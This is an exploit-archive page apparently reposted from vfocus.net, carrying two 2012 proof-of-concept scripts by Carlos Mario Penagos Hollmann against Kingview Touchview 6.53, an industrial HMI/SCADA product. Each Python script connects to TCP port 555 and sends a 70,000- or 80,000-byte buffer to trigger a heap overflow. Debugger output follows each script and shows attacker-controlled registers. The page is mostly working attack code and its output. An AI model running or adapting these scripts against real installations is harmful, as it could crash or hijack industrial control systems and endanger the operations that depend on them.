首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Kingview Touchview 6.53 Multiple Heap Overflow Vulnerabilities
来源:vfocus.net 作者:Hollmann 发布时间:2012-06-26  

# Exploit Title: Kingview 6.53 touchview.exe heap overflow 2
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.kingview.com

# Version: 6.53
# Tested on: Windows SP 1
# CVE :

Open kingivew click on Make choose network configuration--->network
parameter , then  go to the node type and choose Local is a Login Server,
run the demo port 555 will be open.
NOTE:
This was already patched by the vendor silently.

import os
import socket
import sys

host ="10.0.2.15"
port = 555

exploit=("D"*70000)
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host,port))
s2.send(exploit)
data = s2.recv(1024)
s2.close()

eax=42424242 ebx=00140000 ecx=0098ffff edx=00990000 esi=00140748
edi=00000004
eip=7c902a9d esp=0012f0b8 ebp=00140748 iopl=0         nv up ei pl nz na pe
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00010206
ntdll!tan+0xcf:
7c902a9d 8b18            mov     ebx,dword ptr [eax]  ds:0023:42424242=?????
c902a8d 55              push    ebp
7c902a8e 8be9            mov     ebp,ecx
7c902a90 8b5504          mov     edx,dword ptr [ebp+4]
7c902a93 8b4500          mov     eax,dword ptr [ebp]
7c902a96 0bc0            or      eax,eax
7c902a98 740c            je      ntdll!tan+0xd8 (7c902aa6)
7c902a9a 8d4aff          lea     ecx,[edx-1]
7c902a9d 8b18            mov     ebx,dword ptr [eax]
ds:0023:42424242=????????
7c902a9f f00fc74d00      lock cmpxchg8b qword ptr [ebp]
7c902aa4 75f0            jne     ntdll!tan+0xc8 (7c902a96)
7c902aa6 5d              pop     ebp
7c902aa7 5b              pop     ebx
7c902aa8 c3              ret
7c902aa9 8d4900          lea     ecx,[ecx]
7c902aac 8f0424          pop     dword ptr [esp]
7c902aaf 90              nop
7c902ab0 53              push    ebx
7c902ab1 55              push    ebp

 

###############################################################


# Exploit Title: Kingview Touchview EIP direct control
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.kingview.com

# Version: 6.53
# Tested on: Windows SP 1
# CVE :

Open kingivew click on Make choose network configuration--->network
parameter , then go to the node type and choose Local is a Login Server,
run the demo port 555 will be open.
NOTE:
This was already patched by the vendor silently.


import os
import socket
import sys

host ="10.0.2.15"
port = 555

exploit=("B"*80000)

 


s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host,port))
s2.send(exploit)
data = s2.recv(1024)
s2.close()

7c91b1ea 8b4610 mov eax,dword ptr [esi+10h]
7c91b1ed 3bc3 cmp eax,ebx
7c91b1ef 8945fc mov dword ptr [ebp-4],eax
7c91b1f2 0f849e000000 je ntdll!RtlpUnWaitCriticalSection+0x2f
(7c91b296)
7c91b1f8 8b06 mov eax,dword ptr [esi]
7c91b1fa ff4010 inc dword ptr [eax+10h]
ds:0023:42424252=????????
7c91b1fd 8b45fc mov eax,dword ptr [ebp-4]
7c91b200 83e001 and eax,1
7c91b203 8945e8 mov dword ptr [ebp-18h],eax


ntdll!RtlpWaitForCriticalSection+0x5b

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Kingview Touchview 6.53 EIP Ov
·Slimpdf Reader 1.0 Memory Corr
·Apple iTunes 10 Extended M3U S
·Able2Extract and Able2Extract
·Adobe Flash Player Object Type
·Able2Doc and Able2Doc Professi
·Qutecom (Cross-platform, open
·Winmap 5.13 Full- Exception Ha
·URL Hunter buffer overflow DEP
·Western Digital TV (WD-TV) Liv
·Apple iTunes <= 10.6.1.7 Exten
·Root Exploit Western Digital's
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved